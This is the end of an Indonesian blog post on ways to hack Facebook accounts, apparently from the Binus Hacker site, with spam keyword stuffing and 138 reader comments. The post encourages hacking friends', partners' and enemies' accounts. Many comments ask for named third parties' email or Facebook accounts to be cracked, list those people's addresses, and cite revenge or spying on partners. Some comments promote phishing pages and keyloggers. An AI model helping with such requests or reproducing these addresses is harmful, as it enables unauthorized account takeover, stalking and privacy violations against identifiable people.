Nah, dari beberapa cara hack facebook dan pencegahannya di atas semoga anda lebih berhati-hati, untuk lebih detail mengenai tiap metode atau cara yang saya sebutkan di atas akan saya bahas di postingan saya yang selanjutnya, semoga bermanfaat dan semoga akun facebook anda tidak kena hack :)

Selamat berekperimen untuk mencoba berbagai cara hack facebook, berbagai cara hack fb, berbagai cara hack account facebook, hack facebook teman, hack facebook pacar, hack facebook musuh, hack akun facebook, cara hack facebook, cara ngehack facebook, cara hack password facebook, cara hack account facebook, crack facebook. cara membobol password facebook, cara menjebol password facebook, cara membobol facebook, cara mengetahui account facebook, cara mengetahui password facebook, cara menghack facebook, tutorial hack facebook, tutorial hacking facebook. cara hack facebook, cara hack facebook orang lain, cara hack facebook, cara hack fb, cara hack password facebook, cara hack fb 2011, cara hack facebook orang, cara hack facebook 2011, cara hack fb orang lain, cara hack fb terbaru, cara hack fb 2011, cara hack fb orang, cara hack akun fb, cara hack akun fb orang lain, cara hack akun facebook terbaru, cara hack akun facebook 2011, cara hack password fb, cara hack account fb, cara hack account facebook, cara hack account facebook 2011, cara hack account facebook terbaru, cara hack facebook teman, cara hack facebook pacar, cara hack fb teman, cara hack fb pacar, crack facebook, cara crack fb, cara menjebol fb, cara menjebol akun, fb, cara membobol password facebook, cara menjebol password facebook, cara membobol facebook, cara mengetahui account facebook, cara mengetahui password facebook, cara menghack facebook, tutorial hack facebook, tutorial hacking facebook, tutorial hack fb, tutorial hacking fb, tutorial hacking account fb, tutorial hacking account facebook, tutorial hack account facebook, tutorial hacking password facebook, tutorial hack password facebook, tutorial crack facebook. cara hack facebook cara hack facebook orang lain cara hack facebook cara hack fb cara hack password facebook cara hack fb 2011 cara hack facebook orang. Cara hack facebook 2011 cara hack fb orang lain cara hack fb terbaru cara hack fb 2011 cara hack fb orang cara hack akun fb cara hack akun fb orang lain cara hack akun facebook terbaru cara hack akun facebook 2011 cara hack password fb cara hack account fb cara hack account facebook. Cara hack account facebook 2011 cara hack account facebook terbaru cara hack facebook teman cara hack facebook pacar cara hack fb teman cara hack fb pacar crack facebook cara crack fb. Cara menjebol fb cara menjebol akun fb cara membobol password facebook cara menjebol password facebook cara membobol facebook cara mengetahui account facebook cara mengetahui password facebook cara menghack facebook tutorial hack facebook tutorial hacking facebook. Tutorial hack fb, tutorial hacking fb tutorial hacking account fb tutorial hacking account facebook, tutorial hack account facebook, tutorial hacking password facebook tutorial hack password facebook tutorial crack facebook.

Source: Berbagai artikel di Google! [zaiki, dhani, gunslinger,*.blogspot.com,*.wordpress.com,*jasakom.com,dll]

BINUS HACKER Binus Hacker Chat and Forum

Komentar

138 Komentar Untuk “Berbagai Cara Hack Facebook
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. Sigit pada 26 March 2011 6:31 am

    Lengkap, cobain satu satu dulu akh

  2. Hendra pada 26 March 2011 7:56 am

    Pusing… Mau pilih yang mana nih..

  3. acizninja pada 26 March 2011 11:24 am

    Yang mau nonton videonya silahkan ke sini :
    http://www.binushacker.net/facebook-hack-facebook-hacking.html

    Dan silahkan berdiskusi di sini :
    http://forum.binushacker.net

  4. singgalang pada 26 March 2011 7:10 pm

    Hebat…akan saya coba satu persatu….
    thanks…!

  5. John pada 26 March 2011 9:39 pm

    Keren gila, lengkap abis coy.
    Makasih buat binushacker.
    Tops!

  6. Spica pada 26 March 2011 9:41 pm

    ONE WORD: GREAT ARTICLE!

    MANTAP & LENGKAP ABIEZ..

  7. Agus pada 26 March 2011 10:00 pm

    Binushacker emang mangstabbbbb.
    Akhirnya gw bisa juga ngehack!
    Hahaha, thxxxxxxxxxxx

  8. Kakap pada 26 March 2011 10:02 pm

    Nice share gan!
    Ijin sedot dulu ilmunya juragan

  9. Artikha pada 26 March 2011 10:08 pm

    Panjang amat artikelnya, tapi bagus. Cuman sayangnya saya hanya bisa membaca, gak tau gimana cara makenya.

    Pusing, padahal mau liat passwordnya pacar.
    Bantuin donk..

  10. Anak_Itu pada 27 March 2011 8:04 am

    thanks banget

    ilmunya kanda…..

    gue pasti coba………….

    tuk belajar…..

  11. egi pada 27 March 2011 9:22 am

    gan koq gaga mulu nih masuk situs http://www.700megs.com

  12. wachyu pada 27 March 2011 3:06 pm

    asle,, keren bgat nih,,,

  13. efryanto pada 28 March 2011 7:54 am

    top markotop 4 jempol deh…

    terimakasih atas ilmu2’y gan…
    saya baru tau yang beginian nih..

    maju terus hackers indonesia!!!

  14. sesukadesu pada 29 March 2011 6:01 am

    kalo tidak tahu emailnya bagai mana caranya?

  15. Udah Basi pada 30 March 2011 3:03 am

    jahat juga yah kalau kayak gini jadinya.. :P

  16. 585223 pada 30 March 2011 11:13 pm

    pusing nhe gak ada yang bisa di pake….
    mohon pencerahannya gan ?????????

  17. akmal pada 1 April 2011 5:31 am

    gan gmna cara upload yang di hosting..?? ko gak ada bacaan up load,..???

  18. tukangtepu pada 1 April 2011 3:21 pm

    hahahha si agan iseng banged nih ..

  19. Maya pada 4 April 2011 9:28 pm

    keren abiss.. dan BERHASIL
    hehehe..

    thanxs y siapapun anda
    semoga dapat pahala
    :)

  20. wawan pada 6 April 2011 7:49 am

    mumet gan….. tp tak coba dlu lah…….

  21. ikmalz pada 7 April 2011 11:08 am

    lengkap banget
    dan kaya nya ini beneran bukan kaya blog yang lain nipu melulu

  22. respect_ pada 7 April 2011 9:33 pm

    hahahahaha , agak pusing nie gan

  23. revol pada 8 April 2011 10:47 pm

    makasih iya i ^^……………………….. cara nya

  24. niken pada 9 April 2011 9:21 am

    klo emang bs tlg password borokokock@gmail.com

  25. kucluk pada 9 April 2011 12:18 pm

    klo emang bner bisa tlong hack email/fb saya….
    ni emailnya black_id42@ymail.com
    dtnggu gan…

  26. ari pada 9 April 2011 10:45 pm

    pusing mau pilih yg mana
    gkgkgkkgg

  27. aship.b pada 11 April 2011 1:00 am

    tolong kalau bisa hack emaill ini aship.barkiya@gmail.com kirimnya kesini aship_barkiya@yahoo.com

  28. hacker cacad pada 11 April 2011 11:43 pm

    keren….
    wajib di coba nih..

  29. sadikin pada 14 April 2011 2:58 am

    blom nyoba da pusing dlu bro….
    tp keren abis THQ…tutornya……:)

  30. dwys pada 14 April 2011 4:54 pm

    wah banyak bngt ternyata teknik hackingnya…..
    cobain satu persatu dulu ah….

    Temukan Emas Disini

  31. satria pada 15 April 2011 7:02 am

    bingung kalo d suruh ngisi “dimana ayah anda dilahirkan?” kan saya g tau target ngisi apa, mesti gmn bang?

  32. Andrew pada 15 April 2011 11:56 am

    wah… dari dlu tak tungguin neh… kbarx… wuih wuih…. patut dicoba…

    Mantap….

  33. satria pada 15 April 2011 7:32 pm

    bro gmn?

  34. elaa pada 16 April 2011 4:30 am

    tolong dong dihack id facebook n yahoo cecilia.lengkong@yahoo.com krm k email gregorio_gakia@ymail.com ya paswnya….plzzz

  35. D_0nY pada 16 April 2011 10:32 pm

    mantap bnget nih website nya………………………
    Tapi aku bingung mau plih yg mana ………..

  36. kamtis pada 17 April 2011 7:55 am

    izin promosi mas

    download film bioskop gratis full movie

    http://kamtiscyber.blogspot.com/

  37. cyber-don-po pada 19 April 2011 6:36 am

    good gan… untuk keylogger gak usa install buat sendiri napa. saya aja buat sendiri gak susah2,teman pinjam laptop activin keylogger => hack (devilz) hahaha…

    kalau mau tutor nih ke sini ajax forumku : http://www.polong.us/

    Community Blackpeer.

    buat Worm yuk..

  38. SatriaCyber pada 19 April 2011 7:20 am

    Untuk hack Fb dengan system Pishing apabila sahabat semua Kesulitan dengan Metode di atas… Saya sudah membuatkan aplikasi sederhana Buat sahabat semua.. Cara penggunaanya ada di dalam member area…..Silahkan di coba Kunjungi http://hacker.tms.web.id
    kalo belum punya ID silahkan Daftar dulu Gratis……..

    Selamat mencoba !!!

    Wassalam…
    SatriaCyber

  39. irfan pada 20 April 2011 6:02 pm

    gug ngerti gan …

  40. Lowo pada 22 April 2011 2:17 am

    Ane udah pernah Nyoba yang FORGOT pASS MAnual,,,

    tp kendalanya msti salah dpertanyaan keamanan…

    heedeehh!!!

    caranya tw Pegimana yaaak…???

  41. dhani pada 22 April 2011 5:41 am

    hehehe…maksih gan……

  42. Zerocoffee pada 22 April 2011 10:52 pm

    gan keylogger nya aman dari virus ngga tuh??
    soalnya kbnyakan keylogger yg sya download dri situs* trntu bnyk virus berahaya d dalam nya..??

  43. Sephiroth pada 27 April 2011 10:28 am

    Pada Teknik phising…
    pengetesan nya bagaimana ya…
    bingung,,,

  44. Joe pada 1 May 2011 6:02 am

    Hampir berhasil dengan metode lupa password, sayangnya ada konfirmasi untuk verifikasi 3 teman dari daftar temnan di facebook target. :( :(
    kok bisa gitu ya? aku coba test dari email kedua, verifikasinya cuma jawab pertanyaan :( waah pusing kalo harus verifikasi 3 teman dia

  45. arfa pada 2 May 2011 7:07 pm

    bobol

  46. hh pada 2 May 2011 9:40 pm

    mantap

  47. kacrut pada 3 May 2011 9:37 am

    mantaabbbbbb…

  48. shanty38 pada 6 May 2011 8:02 am

    masa se fb bisa dibobol??????????????????????????????????????????

  49. constantine pada 6 May 2011 10:19 am

    facebook bisa di bobol dengan mudah, kalau loe pernah save password
    lebih jelas kunjungi nih blog saya
    http://www.john-constantine9.blogspot.com

  50. aconk doank pada 9 May 2011 10:15 am

    gan bagaimana cara membuka kembali akun facebook yg td kita hack agar kembali normal lg, mksdnya supaya biar bisa d gunakan lg, cz mw ngasih pelajaran ajah…..

  51. paktanijunior pada 11 May 2011 4:42 am

    hello gan….KALO UNTUK SCRIPT FAKE LOGIN BANK ADA GA YA ?n GMNA CARANYA ?tx

  52. wins32nt pada 11 May 2011 4:29 pm

    ngeriii cruttttt
    wah wah jatah programer sejati ma tools nya ngeri

  53. lpuarmy pada 12 May 2011 7:09 am

    ilmu yg sangat bermanfaat … dcoba dlu gan ..

  54. Rancho pada 17 May 2011 8:43 am

    hey semuanya,,bantuin ane dungz,,tgl 14 kmaren akun yahoo mail dan fb gw di bobol orang,,dah di ubah kata sandi n pertanyaan keamanannya,,gmn nich,,help plisszz,,;'(

  55. bayz pada 19 May 2011 4:40 am

    mantap gan,,,ijin sedot yh,,,,semoga ilmunya bermamfaat….

  56. Hacker pada 20 May 2011 6:18 am

    Mantap

  57. andi pada 26 May 2011 8:41 pm

    gan g mna cara hack pake yahoo

  58. tetep demen pada 28 May 2011 6:23 am

    ada beberapa langkah yang pernah ane coba tapi hasilnya nihil gan

  59. geje pada 31 May 2011 6:13 pm

    emang bner gan lw gmail susah dioprak2, lw yahoo emg dah ane coba berhasil…

  60. 123oljumaboks pada 31 May 2011 9:49 pm

    ada keyloger family kk

  61. rudal_irak pada 1 June 2011 6:13 pm

    waduh beisi virus semua softwarenya,,,,,wkwkwkwkwkwkkkkk… gmana mau bsa di pakai……

  62. saya pada 2 June 2011 2:49 am

    ane dah ngerjain 2 temen

  63. bobi pada 2 June 2011 2:59 am

    klok emng bner bisa ngehack hack email / fb ni

    agunkdropdead13@yahoo.com

  64. shuiigatsu pada 4 June 2011 9:19 pm

    t.t.o.o.p.p b.a.n.g.e.t..t.t.t.t..t.

  65. andy pada 6 June 2011 8:00 am

    mas file index.html nya di mna ya???????
    saya pake http://biz.ht
    tolong pencerahannya ya……..

  66. jack00 pada 7 June 2011 5:52 pm

    pusing maw coba yang mana doloe

  67. angga pada 11 June 2011 2:45 pm

    bingung cara nge hack’nya???

  68. anonymous pada 18 June 2011 7:31 pm

    kaka sorry yg link simple dictonary attack not work :(
    mohon di perbaikin ya
    facebook aku di hack orang kaka :(

  69. Gesturenanda pada 22 June 2011 11:28 pm

    Nice banget thanks yang udah share berbagai cara hack facebook

  70. lawlietRuizenban pada 24 June 2011 6:56 am

    ajiiiiiiiibb!!!
    coba ngeHack pakek cara “yang masuk ke otak” aja ==
    makasih gan :-)

  71. revol pada 25 June 2011 3:06 am

    mantap GAN nambah ilmu nie biar mengtahun pelajaran IT ^^ :-)

  72. yuma pada 30 June 2011 1:06 am

    omm klo celah xss buat recdirect ke fake login gmana yuuu on?????

  73. Emka pada 1 July 2011 7:57 am

    Pak Admin,bisa ga tolong hack forum FB dg alamat: http://m.facebook.com/profile.php?id=162180573810027
    karna forum ini telah dihack oleh oknum yg memecah belah islam.
    Sebelumnya syukron.

  74. alfan pada 2 July 2011 1:24 pm

    bingung menggunakannya….kak tolong dong hacker fb dengan alamt : http://www.facebook.com/profile.php?id=100002475262561

  75. bay pada 5 July 2011 10:21 am

    wah kalau ini mah craker and bkan hacker. . .
    Huph q sbagai com hacker jdy gk enak nie, . Tlong bedain dunk hacker ama cracker…

  76. ANIS pada 10 July 2011 2:12 am

    tolong cari tau pasword.x email ini gan

    hudalah_pese@live.com

    pLiiisss ..

  77. lulu rano pada 12 July 2011 8:40 pm

    bro, tolong hack in face book ini dong email: adityatriadi@rocketmail.com

    kalau sudah berhasil tolong kirim hasil nya ke e-mail: mainranjang@gmail.com ya broo..

    soalonya orang ini mengganggu kesenangan saya terus.. kalau gak percaya lihat status nya..

  78. jemima pada 13 July 2011 3:43 am

    aku udah coba cara diatas gk bisa -____- maklum saya masih bocah ._.v tolong kakak2 yang bner2 hacker ahli, ada dendam kesumat ini T,T uang melayang gara2 temen emailna-> tata.lovery@yahoo.com yg bisa bantu hub aku aja okeoke ;)

  79. Rifky pada 24 July 2011 1:58 pm

    NAH YG KAYA GINI YG BNERR DAN GAK NIPUU<<< MANA BISA HACK FACEBOOK LANGSUNG SATU SOFTWARE KAYA YG DI SERCH GOOGLE

  80. Lawlit pada 26 July 2011 4:02 am

    plis hack ini donk..

    fia_cubby@yahoo.co.id

    plis bgt, aq pgn bales dendem

  81. tronixcyber pada 28 July 2011 10:05 am

    wduh… y ang kayak gitu kurang ajibb mas bro… ada stu cara lagi nehhh… pake livehack… pengen tahu….. langsung ajaha

    pertama tama ajak tuh orang minum, sampe bener2 mabok, trus kalo dah mabok… tanya ajha email ama passwordnya. dijamin langsun dijawab…

    yang kedua. loe harus tidur bareng korban yang loe hack… syaratnya loe harus begadang. kalo udah… pantau ajha sampai tuh korban mengigau, baru loe siap2 tanya email ama password FBnya…

    yang terakhir di gendam ajha tuh anak biar dia bisa kasih tahu email ama password FBnya…

    gampang khan….

  82. Ci Garantang pada 29 July 2011 3:05 pm

    Muantap gan,,,tpi sebelum saya baca tutor ini saya udah coba2 iseng2 harus nebak2 pertanyaan yang di ajukan site yang bersangkutan,,,yang pengen saya tanyakan bagaimana cara mendapatkan pertanyaan yang di ajukan site tersebut :-(
    thnk gan

  83. wito danro pada 30 July 2011 9:39 pm

    w pengen jadi hecker mudah2n bisa lah

  84. TYr2 pada 2 August 2011 8:29 am

    CARANYA???

  85. dSky oix pada 3 August 2011 1:21 pm

    Lagi pusing pdhl pgn bgt ngliat aktivitas pacar di fb atw twtrnya …gan ane save ya page nya..swaktu2 ane pake..makasih..

  86. eliana pada 8 August 2011 5:34 am

    gan, tolong bukain password fb or email : elianatiara@yahoo.com dong, kirim ke eliana.tiara@yahoo.com……sekalian no rekening agan juga…makasih

  87. wowokbegheng pada 10 August 2011 10:22 pm

    matur suwun,, seep .. kl bisa kirim tutorial hav-jack dong,, atou fro hack v terbaru,, trimsss

  88. RIZKI pada 12 August 2011 1:44 am

    Om ..
    bukan nya Keylogger Berbahaya untuk di KOMPUTER !!!
    Tuhkan BAHAYA banget om

    Kenapa keylogger itu bisa untuk ngehack Facebook !!
    Tolong pencerahan

  89. RIZKI pada 12 August 2011 1:46 am

    Tuh untuk di FORUM !

    misalnya :

    forum Mybb , IPB ,dll

    itu bisa DI HACK gk om !

  90. jojo pada 12 August 2011 6:33 am

    mau nanya boss gimana caranya install file .xpi tersebut kalo sudah di download tolong di email ke jojo_stars@asia.com maklum masih pemula.mumpung ada kesempatan dari binus hecker

  91. Domzz pada 12 August 2011 7:29 pm

    Permisi om.
    Bisa hack e-mail aku gak om?

    skull70skull@yahoo.com

    Di dalemnya banyak data-data penting, sialnya gue lupa password sama security questionnya.
    Please om, send kontak ke skull70@gmail.com

  92. bahri pada 14 August 2011 10:02 am

    cara nemuin alamat e-mail fb yg di sembunyiin gmn???

  93. bahri pada 14 August 2011 10:04 am

    cara nemuin alamat e-mail yg d sembunyiin gmn???

  94. riami pada 14 August 2011 11:02 pm

    Ohhhhhhh……….. bisa toh

  95. Are pada 16 August 2011 11:50 am

    WADUUUH ,,

    Dapet sumbernya dari mana nih banyak bangeeeeeeeetts , gurunya siapa sih , , Hebaat dah

  96. lontong pada 16 August 2011 6:57 pm

    kk, gw pake yg cara pake email, tapi kata si Y**HO “Looks like you had trouble reading the security code

    Please try to validate the security code again.”
    itu terus, padahal kan cuma minta email dia nya, eh kok malah security2 code segala. mohon pencerahan kk T_T

  97. erin pada 17 August 2011 10:55 am

    Tolong hack dan delete email miszerine@yahoo.com
    Baru 6march2011 aku buat email I’d itu, udah dicuri org. Tolong ya hack dan delete. 3 bulan lagi nnt aku bina kembali Id itu.
    Makasih

  98. dhiet pada 17 August 2011 2:50 pm

    cuma disini emang yang paling TOP

  99. Fery orlan pada 20 August 2011 6:49 am

    kk tolongin saya dong -_- tolong cari tau pswrd email ini yolandasasmitha1@yahoo.com
    dy mantan saya, saya cuma mau tau skrng dy lg deket sma siapa ?
    tolong kirimkan pswrd’a ke email saya feryorlan_09@yahoo.com

    terimakasih

  100. suid pada 21 August 2011 12:39 pm

    Yg cara fake login ko g ada file CSS nya???
    Cm html sama php aja ya!!!!

  101. zulkarnain azhar pada 23 August 2011 2:43 pm

    bro, tolong hack in face book ini dong email: xiaoleidan@tom.com dan hotchian_@hotmail.com

    kalau sudah berhasil tolong kirim hasil nya ke e-mail: zul930913@yahoo.com ya broo..makasih^.^

  102. zulkarnain azhar pada 23 August 2011 2:45 pm

    bro . maap..bukan face book tp email ya..tolong hack ya bro..

  103. Phantom pada 30 September 2011 5:33 am

    all tolong hack akun email nya: tara_firdaus@yahoo.co.id
    kalau udah kamu ganti password,nya kirim password email yang kamu udah ganti ke ramadhani.bintang@rocketmail.com

    THANKS

    N.B.Aku mau balas dendam!!!!!

  104. liana pada 30 September 2011 8:57 am

    Mo nanya donk…. Kan aku sudah install douglas keylogger di pc yang pakai domain, pake user id nya administrator. Dan pas install nga pake password. Tapi pas diaktifin di pc user pas mo baca informationnya dia minta password. Padahal pas install nga pake password… Kenapa ya?

  105. AREMA pada 8 October 2011 1:23 am

    punyeng……..

  106. rip pada 11 October 2011 2:45 am

    gan yang
    “facebook 007″ blom ad gmn nih??

  107. kilm pada 28 October 2011 12:45 am

    klau di warnet kan pke deefreze jadi percuma pke keylogger juga
    q dah coba w bobol df nya trus w install keyloggerna tapi gg kesimpan pswrdna krna df

  108. sic58 pada 2 November 2011 5:01 am

    ha..ha..ha..saya korban keusilan orang yang saya percayai…akhirnya tuh akun FB koit dah

  109. oni pada 11 November 2011 4:40 am

    gan,,minta tlg hack facebook dunk,,ane bayar d..

  110. anenda pada 25 November 2011 10:49 am

    letak preferences icon dmna..? di firefox q g ad..

  111. Abdul pada 13 December 2011 6:07 am

    gan, kalo boleh nanya, gimana sih cara ngejebol hotspot ?

  112. handsome pada 3 January 2012 11:10 am

    gimna sih cara ngejebol fb

  113. deribae pada 7 January 2012 9:31 pm

    aku hebat …. (vio)

  114. Rennofan pada 20 January 2012 10:57 am

    Good makasih byk ats ilmunya,,,,,Semoga anda dapet pahala,,,

  115. one pada 6 February 2012 12:37 am

    tahnx ilmunya gan.
    ijin utk coba.

  116. pilot jenius pada 7 February 2012 3:11 pm

    Duh duh waduh waduh klo hrs msang Keyloger di comput org, pa lg di warnet. Bsa2 terbunuh dng cara mngenaskan kita nantinya OM Kris….

    IDE
    Yg sya pngen sih mengutus keyloger via email calon korban.
    Jd,,,, mski jauh, kita tetep bsa HaCek HAceK hahahahaha, gggggggtu om Kris…..

    thank’s
    PILOT J.

  117. newbie pada 10 March 2012 11:33 am

    bos itu file yg index.html kok aneh ya gk kaya facebook yg asli?

  118. Waskito pada 26 March 2012 12:38 am

    Apa benar bisa..???
    tolong coba hack facebook saya deh,,
    aski_234@yahoo.co.id
    terus diganti foto profilnya..
    Terima kasih ^_^

  119. Eijiyuenji pada 30 March 2012 11:06 am

    tolong cari in passswordnya fb ini ya om wahyusan99@yahoo.co.id tlong passwordnya inbox ke saya
    thankz

  120. Kerang_Ajaib pada 9 April 2012 5:13 am

    pusiiing bacanya ……. @_@”

  121. mencobahack pada 27 April 2012 9:53 pm

    yg mana yang bagus untuk sendiri engga pake hosting pliseeeeee
    s

  122. i'm so pain pada 5 May 2012 11:11 pm

    gak bisa pun
    tolong buatin yg lebih simpel(ringkas) donk

  123. SAFRIZAL pada 11 May 2012 10:33 pm

    gan mumet..bacanya..tolong Dong kalau boleh aku tel/ sms..lam tuk keluarga.

  124. jhon pada 22 June 2012 3:16 am

    gan..
    saya lupa pass nya keylogger douglas.
    gmna cara nya ya gan..
    yar saya bisa buka lagi tu keyloger.
    mohon pencerahan dong gan..
    balas ke email saya aja gan..
    siapa aja yang bisa bantu ane gan…
    balas kesini ya gan.. warjhon@rocketmail.com..
    mohon ya gan…

  125. khatami pada 19 August 2012 6:52 pm

    la mis gak tahu pasword email si korban gimana cara membuka email korban….???!!!!

  126. ari pada 3 September 2012 1:42 am

    kalo buat twitter ada ga ??
    hack account orang lain…. soalnya temen saya lg ada masalah keluarga, jd dia minta tolong ke saya untuk cari caranya itu…
    bisa ke email saya deh kontaknya… trims

  127. lef pada 12 September 2012 5:40 am

    knp fb doang yang lain jg gan

    kl fb byk yg dah tau :d:

  128. ozierainbow pada 18 October 2012 8:23 pm

    gan tolong bukain email w yaa…
    cz dh lama di hack smp skr w gak bisa buka sedangkan pertanyaan keamanannya w lupa..
    dfranky90@yahoo.com
    cz dstu semua lamaran ma info loker byk bgt…

  129. oscar alif pada 28 January 2013 11:30 pm

    bosss…….kalo pengen lihat email FB yang bukan teman gimana….tq boss…di tgu email nya….

  130. gandung pada 7 February 2013 9:56 am

    Wah ….baca postingnya udah puyeng ditambah baca komenya banyak lagi ,,,,,ngahahahahahaha ini kalo ibarat buku udah jadi novel nih …buanyak buangettttzzzz

  131. ricko pada 4 December 2013 2:57 pm

    ane biasa beli software hack facebook di dokterakun.blogspot.com gan….
    mantaffff lah….

  132. Putra pada 16 January 2014 4:48 am

    Gan, fotonya ga keluar nie, why?

  133. aji-aji pada 10 February 2014 9:54 pm

    BAGUS tapi bingung GAN ………

  134. Muhammad Anwar pada 12 February 2014 5:53 am

    gan hack lewat HP android ada nggak?

  135. alrin pada 1 March 2014 3:21 am

    kk tolong dong hack fb ni likayurnita123@yahoo.com

    kalo sudh kirim inbook ja ke fb aku alrin.putribungsu@yahoo.co.id

    itu fb adek aku yang di hack cowok nya ‘ tolong nian kk

  136. Anonym pada 22 April 2014 6:26 am

    lebih baik hidup damai aja tanpa hacking sob

  137. amanda licka pada 22 April 2014 9:39 pm

    kk tolong dong hack fb ni ( Intan Mutiara Nento ) fb nya cmn pake nomor hp,profil ID nya *(www.facebook.com/intan.nento.52)*
    itu fb nya teman aku,sekarang telah di gunakan oleh orang lain,Please kk tolong bantuin :'(
    kalo sudah kirim inboox aja ke fb aku amandalicka@yahoo.com

  138. galih pada 21 August 2014 4:51 pm

    Tutorial/penjelasan pemasangan dan pemasangan sniperspy nya kurang faham gan,.tolong di perjelas lagi pliss,..
    Makasih

Silahkan Berikan Tanggapan Anda...